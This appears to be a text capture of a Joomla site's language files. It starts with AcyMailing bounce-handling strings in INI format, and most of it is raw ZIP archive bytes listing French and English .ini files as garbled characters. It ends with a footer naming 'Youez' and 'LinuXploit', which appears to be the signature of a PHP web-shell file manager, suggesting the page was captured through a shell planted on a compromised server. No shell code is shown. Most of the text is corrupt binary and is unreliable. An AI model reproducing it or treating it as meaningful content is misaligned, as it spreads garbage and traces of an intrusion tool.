ACYM_MESSAGE_BLOCKED_RECIPIENTS="Message blocked by recipient filters"
ACYM_MAILBOX_DOESNT_EXIST_2="Mailbox does not exist 2"
ACYM_DOMAIN_NOT_EXIST="Domain does not exist"
ACYM_TEMPORARY_FAILURES="Temporary failures"
ACYM_FAILED_PERM="Failed Permanently"
ACYM_ACKNOWLEDGMENT_RECEIPT_BODY="Acknowledgement of receipt - in body"
ACYM_FINAL_RULE="Final Rule"
ACYM_RESET_DEFAULT_RULES="Reset to default rules"
ACYM_RUN_BOUNCE_HANDLING="Run bounce handling"
ACYM_CONFIGURE="Configure"
ACYM_NO_RULES="Please create a rule to process the bounce handling"
ACYM_CANT_DELETE_AND_SAVE="You can't delete a user and save the mail in the same rule"
ACYM_BOUNCE_RATE="Bounce rate"
ACYM_BOUNCE_RECEIVED="AcyMailing received %1$s messages from the user %2$s"
ACYM_BOUNCE_MIN_EXEC="Actions will be executed after %s messages"
ACYM_SUCC_DELETE_ELEMENTS="Successfully deleted %s record(s)"
ACYM_MESSAGE_DELETED="Message deleted"
ACYM_CLICK_HANDLE_ALL_BOUNCES="Click here to handle all messages until your mailbox is empty"
ACYM_CONFIGURE_BOUNCE="Please configure the bounce handling from the configuration page first"
ACYM_ERROR_CONNECTING="Error connecting to %s"
ACYM_ERROR_LOGIN="Identification error %s"
ACYM_ERROR_UPLOAD_ATTACHMENT="Error uploading the attachment %1$s: %2$s"
ACYM_USER_X_DELETED="User %s deleted"
ACYM_USER_X_SUBSCRIBED_TO="User %1$s subscribed to %2$s"
ACYM_USER_X_NOT_SUBSCRIBED_TO="User %1$s not subscribed to %2$s: "
ACYM_USER_ALREADY_SUBSCRIBED="User already subscribed"
ACYM_USER_ALREADY_UNSUBSCRIBED="User already unsubscribed"
ACYM_USER_X_REMOVED_FROM="User %1$s removed from lists %2$s"
ACYM_USER_X_NOT_SUBSCRIBED="User %s not subscribed"
ACYM_USER_X_UNSUBSCRIBED_FROM="User %1$s unsubscribed from lists %2$s"
ACYM_USER_X_BLOCKED="User %s blocked"
ACYM_USER_X_QUEUE="User %1$s queue: %2$s"
ACYM_BOUNCE_NOT_FORWARD="The forward e-mail address is the same as the bounce one... AcyMailing will not forward the message"
ACYM_BOUNCE_MESSAGE_SAVED="Message saved (user %s)"
ACYM_FORWARDED_TO_X="Forwarded to %s"
ACYM_NOT_FORWARDED_TO_X="Couldn't forward to %1$s: %2$s"
ACYM_DUPLICATE="Duplicate"
ACYM_STYLESHEET_HTML_DESC="If you add some CSS style you will have to save to see the modifications. Note that not all editors allow you to load custom CSS"
PK!)8[�,,en-GB/en-GB.files_j2xml.sys.ininu&1i�; J2XML 3.1.1
; Copyright (C) 2010 - 2013 Helios Ciancio. All rights reserved.
; License GNU General Public License version 3 or later; see LICENSE.php
; Note : All ini files need to be saved as UTF-8

CLI_J2XML="J2XML CLI"
CLI_J2XML_XML_DESCRIPTION="<strong>J2XML</strong> - Command Line Interface"
PK!����overrides/fr-FR.override.ininu&1i�PK!�V�ioverrides/index.htmlnu&1i�PK!��m�A�A�file.phpnu�[���PK!����Bfr-FR/fr-FR.com_tags.ininu&1i�PK!�?5)DD$<Ffr-FR/fr-FR.mod_users_latest.sys.ininu&1i�PK!�i 8���Hfr-FR/fr-FR.lib_phpass.sys.ininu&1i�PK!��nYzz(�Lfr-FR/fr-FR.mod_articles_popular.sys.ininu&1i�PK!g6��ww)�Ofr-FR/fr-FR.mod_articles_category.sys.ininu&1i�PK!��ܨ�fRfr-FR/install.xmlnu&1i�PK!�6�Oefr-FR/index.htmlnu&1i�PK!�u���
�
�efr-FR/fr-FR.com_weblinks.ininu&1i�PK!t�L����pfr-FR/fr-FR.com_content.ininu&1i�PK!���]]��fr-FR/fr-FR.mod_stats.ininu&1i�PK!�V���V�fr-FR/fr-FR.lib_fof.ininu&1i�PK!�����$b�fr-FR/fr-FR.mod_tags_popular.sys.ininu&1i�PK!���5
5
6�fr-FR/fr-FR.lib_ic_library.ininu&1i�PK!tƒ�
�
!��fr-FR/fr-FR.mod_articles_news.ininu&1i�PK!$��W��(��fr-FR/fr-FR.mod_articles_archive.sys.ininu&1i�PK!"����fr-FR/fr-FR.mod_custom.sys.ininu&1i�PK!�@���fr-FR/fr-FR.mod_menu.sys.ininu&1i�PK!�1r����fr-FR/fr-FR.com_search.ininu&1i�PK!�"vr�fr-FR/fr-FR.mod_login.sys.ininu&1i�PK!�%v__#c�fr-FR/fr-FR.mod_breadcrumbs.sys.ininu&1i�PK!�U�		�fr-FR/fr-FR.mod_breadcrumbs.ininu&1i�PK!�(T��m�fr-FR/fr-FR.mod_search.sys.ininu&1i�PK!����

q�fr-FR/fr-FR.mod_search.ininu&1i�PK!O�ݱ����fr-FR/fr-FR.com_newsfeeds.ininu&1i�PK!VƆ#����fr-FR/fr-FR.com_wrapper.ininu&1i�PK!�x8oo"��fr-FR/fr-FR.mod_whosonline.sys.ininu&1i�PK!�[��� ��fr-FR/fr-FR.files_joomla.sys.ininu&1i�PK!�b|�����fr-FR/fr-FR.mod_weblinks.ininu&1i�PK!H���__+��fr-FR/fr-FR.mod_articles_categories.sys.ininu&1i�PK!ł55
5
W�fr-FR/fr-FR.com_config.ininu&1i�PK!g��fr-FR/fr-FR.mod_whosonline.ininu&1i�PK!�ҵEE;
fr-FR/fr-FR.mod_finder.ininu&1i�PK!jjY$$�fr-FR/fr-FR.com_messages.ininu&1i�PK!/�f=��$:fr-FR/fr-FR.mod_articles_popular.ininu&1i�PK!���F9F9D(fr-FR/fr-FR.mod_iccalendar.ininu&1i�PK!�E��
�
�afr-FR/fr-FR.mod_menu.ininu&1i�PK!w��ee�lfr-FR/fr-FR.com_finder.ininu&1i�PK!�m�QQ�yfr-FR/fr-FR.ininu&1i�PK!��_�<	<	��fr-FR/fr-FR.mod_feed.ininu&1i�PK!����X�fr-FR/fr-FR.com_media.ininu&1i�PK!d�������fr-FR/fr-FR.lib_fof.sys.ininu&1i�PK!{��dBB��fr-FR/fr-FR.mod_banners.ininu&1i�PK!�39�kkH�fr-FR/fr-FR.lib_joomla.ininu&1i�PK!{��	���fr-FR/fr-FR.tpl_beez3.sys.ininu&1i�PK!�
�n,,%Afr-FR/fr-FR.mod_related_items.sys.ininu&1i�PK!�)�VV'�fr-FR/fr-FR.mod_articles_latest.sys.ininu&1i�PK!���'��%ofr-FR/fr-FR.mod_articles_news.sys.ininu&1i�PK!�U�%% xfr-FR/fr-FR.mod_weblinks.sys.ininu&1i�PK!��s�

 �fr-FR/fr-FR.mod_random_image.ininu&1i�PK!^�S��#G&fr-FR/fr-FR.mod_articles_latest.ininu&1i�PK!Yj����/fr-FR/fr-FR.lib_joomla.sys.ininu&1i�PK!��m�!�1fr-FR/fr-FR.mod_related_items.ininu&1i�PK!�M����J6fr-FR/fr-FR.mod_syndicate.ininu&1i�PK!2���$K;fr-FR/fr-FR.lib_idna_convert.sys.ininu&1i�PK!�O�� �>fr-FR/fr-FR.mod_users_latest.ininu&1i�PK!D�C��N�N{Cfr-FR/fr-FR.com_users.ininu&1i�PK!�p���"��fr-FR/fr-FR.lib_ic_library.sys.ininu&1i�PK!��&���m�fr-FR/fr-FR.xmlnu&1i�PK!�ؙ4]]^�fr-FR/fr-FR.finder_cli.ininu&1i�PK!�>��ɐɐ�fr-FR/fr-FR.com_icagenda.ininu&1i�PK!ߗ� 1fr-FR/fr-FR.mod_tags_similar.ininu&1i�PK!D$[v��!8fr-FR/fr-FR.tpl_protostar.sys.ininu&1i�PK!q��$;>fr-FR/fr-FR.mod_tags_similar.sys.ininu&1i�PK!.�.��Afr-FR/fr-FR.com_ajax.ininu&1i�PK!e�,?^^'Efr-FR/fr-FR.mod_articles_categories.ininu&1i�PK!j��hh�Lfr-FR/fr-FR.mod_wrapper.sys.ininu&1i�PK!L���zOfr-FR/fr-FR.mod_finder.sys.ininu&1i�PK!�(�V�� �Qfr-FR/fr-FR.mod_tags_popular.ininu&1i�PK!�g+6xx�]fr-FR/fr-FR.mod_stats.sys.ininu&1i�PK!���!!{`fr-FR/fr-FR.mod_custom.ininu&1i�PK!
�RD���dfr-FR/fr-FR.mod_languages.ininu&1i�PK!���(xfr-FR/fr-FR.mod_footer.sys.ininu&1i�PK!��<��
�
�zfr-FR/fr-FR.com_contact.ininu&1i�PK!'%���!��fr-FR/fr-FR.mod_syndicate.sys.ininu&1i�PK!�����
�
��fr-FR/fr-FR.localise.phpnu&1i�PK!`#l����fr-FR/fr-FR.com_privacy.ininu&1i�PK!�D�,77$��fr-FR/fr-FR.mod_random_image.sys.ininu&1i�PK!}G���fr-FR/fr-FR.mod_wrapper.ininu&1i�PK!9�_���!o�fr-FR/fr-FR.lib_simplepie.sys.ininu&1i�PK!9#i++��fr-FR/fr-FR.mod_feed.sys.ininu&1i�PK!�����fr-FR/fr-FR.com_mailto.ininu&1i�PK!�c��II$%�fr-FR/fr-FR.mod_articles_archive.ininu&1i�PK!sg������fr-FR/fr-FR.mod_footer.ininu&1i�PK!$��%%%�fr-FR/fr-FR.mod_articles_category.ininu&1i�PK!3�N�e�fr-FR/fr-FR.tpl_beez3.ininu&1i�PK!h>����fr-FR/fr-FR.mod_login.ininu&1i�PK!��>II�fr-FR/fr-FR.mod_banners.sys.ininu&1i�PK!�&Z���Pfr-FR/fr-FR.tpl_protostar.ininu&1i�PK!Q
���'fr-FR/fr-FR.lib_phputf8.sys.ininu&1i�PK!�
�Iff!2fr-FR/fr-FR.mod_languages.sys.ininu&1i�PK!�V�
�&index.htmlnu&1i�PK!�Ϋg��$B'en-GB/en-GB.mod_articles_archive.ininu&1i�PK!0r%��%*en-GB/en-GB.tpl_protostar.ininu&1i�PK!O�ӇNN0en-GB/en-GB.com_wrapper.ininu&1i�PK!�El������1en-GB/en-GB.lib_joomla.ininu&1i�PK!v�ll r!en-GB/en-GB.mod_random_image.ininu&1i�PK!8��5�� .&en-GB/en-GB.mod_weblinks.sys.ininu&1i�PK!�l�׮�!(en-GB/en-GB.mod_articles_news.ininu&1i�PK!�js�"�"%4en-GB/en-GB.mod_articles_category.ininu&1i�PK!&i$���Ven-GB/en-GB.mod_falang.sys.ininu&1i�PK!
�I���)�Wen-GB/en-GB.mod_articles_category.sys.ininu&1i�PK!�4���"�Yen-GB/en-GB.lib_ic_library.sys.ininu&1i�PK!f�w�WW �\en-GB/en-GB.mod_users_latest.ininu&1i�PK!��22|`en-GB/en-GB.finder_cli.ininu&1i�PK!R�����een-GB/en-GB.mod_stats.sys.ininu&1i�PK!���~~$hen-GB/en-GB.mod_random_image.sys.ininu&1i�PK!,�SL���ien-GB/en-GB.mod_languages.ininu&1i�PK!Ą"��{en-GB/en-GB.com_weblinks.ininu&1i�PK!�O�Woo)B�en-GB/en-GB.files_gantry5_nucleus.sys.ininu&1i�PK!����ZZ
�en-GB/en-GB.lib_joomla.sys.ininu&1i�PK!���hh��en-GB/en-GB.com_tags.ininu&1i�PK!X�y�gg b�en-GB/en-GB.mod_tags_similar.ininu&1i�PK!��a�88�en-GB/en-GB.com_messages.ininu&1i�PK!�q(�����en-GB/en-GB.mod_custom.ininu&1i�PK!�fc99$��en-GB/en-GB.lib_idna_convert.sys.ininu&1i�PK!�	p���9�en-GB/en-GB.mod_stats.ininu&1i�PK!�
Gbss�en-GB/en-GB.com_content.ininu&1i�PK!��u�	�	 ʱen-GB/en-GB.mod_tags_popular.ininu&1i�PK!�X����en-GB/en-GB.mod_feed.ininu&1i�PK!�t��G�G��en-GB/en-GB.ininu&1i�PK!�Jp��#�
en-GB/en-GB.mod_articles_latest.ininu&1i�PK!M���(�en-GB/en-GB.mod_articles_archive.sys.ininu&1i�PK!�����	en-GB/en-GB.lib_fof.ininu&1i�PK!���FF3en-GB/en-GB.mod_menu.ininu&1i�PK!����$�en-GB/en-GB.mod_tags_similar.sys.ininu&1i�PK!������+� en-GB/en-GB.mod_articles_categories.sys.ininu&1i�PK!;T�@��(�"en-GB/en-GB.mod_articles_popular.sys.ininu&1i�PK!��O����$en-GB/en-GB.mod_footer.sys.ininu&1i�PK!�"{/**�&en-GB/en-GB.mod_syndicate.ininu&1i�PK!Ѷ����:+en-GB/en-GB.com_mailto.ininu&1i�PK!��?NN[/en-GB/en-GB.mod_menu.sys.ininu&1i�PK!e#:�cc�0en-GB/en-GB.mod_finder.sys.ininu&1i�PK!�������2en-GB/en-GB.mod_footer.ininu&1i�PK!�bf%��%�5en-GB/en-GB.mod_articles_news.sys.ininu&1i�PK!�7����7en-GB/en-GB.pkg_gantry5.sys.ininu&1i�PK!��E�i8en-GB/en-GB.tpl_beez3.sys.ininu&1i�PK!�P�Q11%�<en-GB/en-GB.files_gantry5_nucleus.ininu&1i�PK!'��j��>Cen-GB/en-GB.mod_breadcrumbs.ininu&1i�PK!~�����%Hen-GB/en-GB.mod_related_items.sys.ininu&1i�PK!ȕ`6�	�	�Ken-GB/en-GB.mod_weblinks.ininu&1i�PK!5΃�Uen-GB/en-GB.com_ajax.ininu&1i�PK!�t]]Yen-GB/en-GB.lib_ic_library.ininu&1i�PK!�_@Q���den-GB/en-GB.com_icagenda.ininu&1i�PK!_� ZZ$��en-GB/en-GB.mod_articles_popular.ininu&1i�PK!�.ǎdd��en-GB/en-GB.com_privacy.ininu&1i�PK!e�5cc#N	en-GB/en-GB.mod_breadcrumbs.sys.ininu&1i�PK!�$5̋�		en-GB/en-GB.mod_wrapper.sys.ininu&1i�PK!������
	en-GB/en-GB.xmlnu&1i�PK!��v{{�	en-GB/en-GB.lib_gantry5.sys.ininu�[���PK!AŽ��'�	en-GB/en-GB.mod_articles_categories.ininu&1i�PK!-������	en-GB/en-GB.com_contact.ininu&1i�PK!����!�"	en-GB/en-GB.tpl_protostar.sys.ininu&1i�PK!E�N�s	s	�'	en-GB/en-GB.mod_login.ininu&1i�PK!�^����1	en-GB/en-GB.tpl_beez3.ininu&1i�PK!�?˫��>	en-GB/install.xmlnu&1i�PK!���A	en-GB/en-GB.com_newsfeeds.ininu&1i�PK!�y�%��F	en-GB/en-GB.lib_phpass.sys.ininu&1i�PK!�ӹ��H	en-GB/en-GB.mod_wrapper.ininu&1i�PK!�b��UU!\O	en-GB/en-GB.mod_related_items.ininu&1i�PK!\�xT	en-GB/en-GB.mod_login.sys.ininu&1i�PK!_�c��'hV	en-GB/en-GB.mod_articles_latest.sys.ininu&1i�PK!I��$XX	en-GB/en-GB.mod_tags_popular.sys.ininu&1i�PK!��laa�Z	en-GB/en-GB.mod_feed.sys.ininu&1i�PK!���!n\	en-GB/en-GB.lib_simplepie.sys.ininu&1i�PK!B��vv�]	en-GB/en-GB.com_search.ininu&1i�PK!��4�
3
3�c	en-GB/en-GB.mod_iccalendar.ininu&1i�PK!Y�Woo��	en-GB/en-GB.mod_banners.sys.ininu&1i�PK!��-���	en-GB/en-GB.lib_phputf8.sys.ininu&1i�PK!K�n���	en-GB/en-GB.mod_whosonline.ininu&1i�PK!ʔ�Ā	�	^�	en-GB/en-GB.mod_search.ininu&1i�PK!�Tpƹ�!(�	en-GB/en-GB.mod_languages.sys.ininu&1i�PK!�ӌww2�	en-GB/en-GB.com_media.ininu&1i�PK!H>����"��	en-GB/en-GB.mod_whosonline.sys.ininu&1i�PK!�CI@@�	en-GB/en-GB.lib_fof.sys.ininu&1i�PK!6񳸜���	en-GB/en-GB.mod_banners.ininu&1i�PK!ܪgl�� ��	en-GB/en-GB.files_joomla.sys.ininu&1i�PK!i� 
�	�	��	en-GB/en-GB.com_config.ininu&1i�PK!-Ol&PP��	en-GB/en-GB.mod_search.sys.ininu&1i�PK!VD1H����	en-GB/en-GB.mod_finder.ininu&1i�PK!��hrr��	en-GB/en-GB.mod_custom.sys.ininu&1i�PK!$z@�kkG�	en-GB/en-GB.localise.phpnu&1i�PK!_}ss$��	en-GB/en-GB.mod_users_latest.sys.ininu&1i�PK!,�?ff��	en-GB/en-GB.com_finder.ininu&1i�PK!x���HHq
en-GB/en-GB.mod_falang.ininu&1i�PK!ȸ�#WEWE
en-GB/en-GB.com_users.ininu&1i�PK!ǺhY��!�S
en-GB/en-GB.mod_syndicate.sys.ininu&1i�PK!$�agg!�U
en-GB/en-GB.mod_sppagebuilder.ininu&1i�PK!�8���%M\
en-GB/en-GB.mod_spsimpleportfolio.ininu&1i�PK!�A(����l
en-GB/en-GB.tpl_flex.ininu&1i�PK!~ҿ%%%�ken-GB/en-GB.com_spsimpleportfolio.ininu&1i�PK!7Dur�H�H('oen-GB/en-GB.mod_ap_smart_layerslider.ininu&1i�PK!�{��
+
+'
�en-GB/en-GB.mod_ajax_intro_articles.ininu&1i�PK!����33#q�en-GB/en-GB.files_cli_j2xml.sys.ininu&1i�PK!th���!��en-GB/en-GB.com_sppagebuilder.ininu&1i�PK!vٖ�����en-GB/en-GB.com_acym.ininu&1i�PK!)8[�,,��
en-GB/en-GB.files_j2xml.sys.ininu&1i�PK���Hm�

Youez - 2016 - github.com/yon3zu
LinuXploit